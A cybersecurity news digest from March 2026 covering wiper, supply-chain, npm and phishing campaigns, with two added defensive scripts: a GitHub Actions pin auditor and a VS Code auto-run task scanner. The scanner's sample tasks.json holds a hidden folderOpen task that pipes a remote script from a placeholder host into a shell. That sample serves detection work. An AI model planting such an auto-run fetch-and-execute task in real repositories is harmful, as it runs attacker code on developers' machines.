CyberNews: 24/03/2026 Edition

Published by Dunateo on 2026-03-24

Today’s roundup

  • ‘CanisterWorm’ Springs Wiper Attack Targeting Iran
  • 81-month sentence for Russian hacker behind major ransomware campaigns
  • North Korea-linked threat actors abuse VS Code auto-run to spread StoatWaffle malware
  • Citrix Urges Patching Critical NetScaler Flaw Allowing Unauthenticated Data Leaks
  • QNAP fixed four vulnerabilities demonstrated at Pwn2Own Ireland 2025
  • Pro-Iranian Nasir Security is targeting energy companies in the Gulf
  • Hacker walks away with $24.5 million after breaching Resolv DeFi platform
  • Crunchyroll probes breach after hacker claims to steal 6.8M users' data
  • Ghost Campaign Uses 7 npm Packages to Steal Crypto Wallets and Credentials
  • Tycoon2FA phishing platform returns after recent police disruption

Summary

    The TeamPCP hacking group deployed "CanisterWorm," an Iran-targeted wiper that destroys data on systems that identify as located in Iran, including Kubernetes clusters, with its operations orchestrated through Internet Computer (ICP) canisters. The group also continued its supply chain attacks, compromising Aqua Security's Trivy and Checkmarx GitHub Actions to steal credentials from the CI pipelines that ran them.
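    A compromised third-party Action reaches every pipeline that references it by a mutable tag or branch; the standard check is to pin `uses:` references to a full 40-hex commit SHA so a pushed tag cannot swap in new code. The script below is an added example, not code from the page, Aqua Security, Checkmarx, or GitHub; the workflow text is constructed for illustration, the SHA is a placeholder, and the action refs shown are not claimed to be the versions involved in the reported compromise.

```python
"""
Flag GitHub Actions 'uses:' references that are not pinned to a full
commit SHA. Added example; the workflow below is constructed sample input.
"""
import re
import sys
from typing import Dict, List

# Matches "uses: owner/repo[/path]@ref" whether or not the line starts a list item;
# stops at whitespace, quotes or a trailing '# comment'.
USES_RE = re.compile(r"^\s*-?\s*uses:\s*['\"]?([^\s'\"#]+)['\"]?", re.M)
FULL_SHA_RE = re.compile(r"^[0-9a-f]{40}$")

# Constructed sample workflow (not a real pipeline). The 40-hex SHA is a placeholder.
SAMPLE_WORKFLOW = """
name: ci
on: [push]
jobs:
  scan:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Trivy scan, mutable branch ref
        uses: aquasecurity/trivy-action@master
      - name: Checkmarx, pinned to a commit
        uses: checkmarx/ast-github-action@0123456789abcdef0123456789abcdef01234567 # v2
      - uses: ./.github/actions/local-step
      - uses: docker://alpine:3.19
"""


def audit_uses(workflow_text: str) -> List[Dict[str, str]]:
    """Return one finding per remote action reference that is not SHA-pinned."""
    findings = []
    for match in USES_RE.finditer(workflow_text):
        ref = match.group(1)
        # Local composite actions and container images need a different check.
        if ref.startswith("./") or ref.startswith("docker://"):
            continue
        if "@" not in ref:
            findings.append({"uses": ref, "reason": "no ref at all"})
            continue
        _, version = ref.rsplit("@", 1)
        if FULL_SHA_RE.match(version):
            continue
        # Tags and branches are mutable; short SHAs are also rejected because
        # they are not collision-resistant as a pin.
        findings.append({"uses": ref, "reason": f"mutable or short ref {version!r}"})
    return findings


if __name__ == "__main__":
    text = open(sys.argv[1], encoding="utf-8").read() if len(sys.argv) > 1 else SAMPLE_WORKFLOW
    hits = audit_uses(text)
    for hit in hits:
        print(f"UNPINNED {hit['uses']}: {hit['reason']}")
    sys.exit(1 if hits else 0)
```

    Run it against `.github/workflows/*.yml` in CI and fail the job on any finding; pinning is only useful if the pin is also updated deliberately (for example by Dependabot or Renovate with review), otherwise teams drift back to tags.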

    A 26-year-old Russian, Aleksei Olegovich Volkov, received an 81-month U.S. prison sentence for acting as an initial access broker for ransomware groups, including Yanluowang, causing over $9 million in damages. He was ordered to pay $9.1 million in restitution.

    North Korea-linked "Team 8" is spreading "StoatWaffle" malware via malicious Microsoft Visual Studio Code projects that abuse the tasks.json auto-run feature: a task configured to run when the folder is opened executes the attacker's command with no further interaction once the workspace is trusted. The modular malware includes stealer and RAT functions and targets browser credentials, extension data, and the macOS Keychain.
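    The auto-run in question is a task carrying `runOptions.runOn: "folderOpen"` in `.vscode/tasks.json`; VS Code only executes it in a trusted workspace, so the moment to check is before clicking "Trust" on a cloned repository. The triage script below is an added example, not code from the page or from the malware's authors; the embedded tasks.json is constructed for illustration and its URL is a placeholder.

```python
"""
Report VS Code tasks that run automatically on folder open.
Added example; the sample tasks.json below is constructed input.
"""
import json
import os
import re
import sys
from typing import Dict, List

AUTO_RUN = "folderOpen"  # the runOptions.runOn value that triggers on workspace open

# Constructed sample: one ordinary build task and one hidden task that pipes a
# remote script into a shell as soon as the folder is opened (placeholder URL).
SAMPLE_TASKS_JSON = r'''
{
  // tasks.json is JSON-with-comments and tolerates trailing commas
  "version": "2.0.0",
  "tasks": [
    {
      "label": "build",
      "type": "shell",
      "command": "npm run build",
    },
    {
      "label": "setup",
      "type": "shell",
      "command": "curl -fsSL http://example.invalid/s.sh | sh",
      "runOptions": { "runOn": "folderOpen" },
      "presentation": { "reveal": "never" }
    }
  ]
}
'''


def strip_jsonc(text: str) -> str:
    """Remove /* */ and full-line // comments and trailing commas so json.loads
    accepts VS Code's dialect. Inline // after a value is not handled; this is
    a triage script, not a full JSONC parser."""
    text = re.sub(r"/\*.*?\*/", "", text, flags=re.S)
    text = re.sub(r"^\s*//.*$", "", text, flags=re.M)
    text = re.sub(r",(\s*[}\]])", r"\1", text)
    return text


def find_auto_run_tasks(tasks_json_text: str) -> List[Dict[str, object]]:
    """Return every task that VS Code would start on folder open."""
    data = json.loads(strip_jsonc(tasks_json_text))
    findings = []
    for task in data.get("tasks", []):
        if (task.get("runOptions") or {}).get("runOn") != AUTO_RUN:
            continue
        parts = [str(task.get("command", ""))] + [str(a) for a in task.get("args", [])]
        findings.append({
            "label": task.get("label", "<unnamed>"),
            "type": task.get("type", ""),
            "command": " ".join(p for p in parts if p),
            # reveal: never keeps the terminal closed, so the victim sees nothing
            "hidden": (task.get("presentation") or {}).get("reveal") == "never",
        })
    return findings


def scan_repo(root: str) -> List[Dict[str, object]]:
    """Walk a checkout and collect folderOpen tasks from every .vscode/tasks.json."""
    findings = []
    for dirpath, _, filenames in os.walk(root):
        if os.path.basename(dirpath) == ".vscode" and "tasks.json" in filenames:
            path = os.path.join(dirpath, "tasks.json")
            with open(path, encoding="utf-8") as fh:
                for hit in find_auto_run_tasks(fh.read()):
                    hit["file"] = path
                    findings.append(hit)
    return findings


if __name__ == "__main__":
    hits = scan_repo(sys.argv[1]) if len(sys.argv) > 1 else find_auto_run_tasks(SAMPLE_TASKS_JSON)
    for h in hits:
        print(f"AUTO-RUN task {h['label']!r} ({h['type']}): {h['command']}"
              + (" [terminal hidden]" if h["hidden"] else ""))
    sys.exit(1 if hits else 0)
```

    Keep Workspace Trust enabled (`security.workspace.trust.enabled`) so untrusted folders open in Restricted Mode, and treat any folderOpen task that fetches or executes remote content as hostile regardless of the repository's apparent purpose.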

    Citrix issued urgent patches for two vulnerabilities in NetScaler ADC and NetScaler Gateway: a critical flaw that allows unauthenticated data leakage (CVE-2026-3055, CVSS 9.3) and a race condition (CVE-2026-4368).

    QNAP addressed four vulnerabilities in QuRouter, the firmware for its SD-WAN routers (CVE-2025-62843 through CVE-2025-62846), demonstrated by Team DDOS at Pwn2Own Ireland 2025. Chained, the flaws allowed root access, code execution, and access to data on the device.

    The pro-Iranian "Nasir Security" group is targeting energy companies and their supply chain vendors in the Middle East. Tactics include business email compromise (BEC), spear phishing, exploitation of public-facing applications, and exfiltration of data from cloud services, with the aim of stealing sensitive documents that could support future attacks.

    A hacker stole approximately $24.5 million in Ethereum from the Resolv DeFi platform. The platform offered the attacker a bounty of 10% of the stolen funds in exchange for the return of the remainder.

    Anime streaming platform Crunchyroll is investigating claims from hackers who allege they compromised systems and exfiltrated personal information belonging to approximately 6.8 million users.

    The "Ghost campaign," attributed to the npm account "mikilanjillo," involves seven malicious npm packages designed to steal cryptocurrency wallets and developer credentials. Any project that pulled them in, directly or as a transitive dependency, should be treated as a supply chain compromise.

    The "Tycoon2FA" phishing-as-a-service (PhaaS) platform has resumed operations at previous activity levels following a disruption by Europol in early March. It continues to rely on adversary-in-the-middle (AiTM) proxying to capture session cookies and bypass MFA; this defeats OTP and push-based factors but not origin-bound, phishing-resistant methods such as FIDO2/WebAuthn.

    Want to dig deeper?

    Vulnerabilities

    CVE             Severity (as tagged on this page)
    CVE-2026-3055   Medium
    CVE-2026-4368   Medium
    CVE-2025-62843  Low

    The severity tags above do not match the vendor ratings cited in the summaries: CVE-2026-3055 carries a CVSS score of 9.3 (Critical) according to the Citrix item, so prioritise by the vendor score rather than by these labels.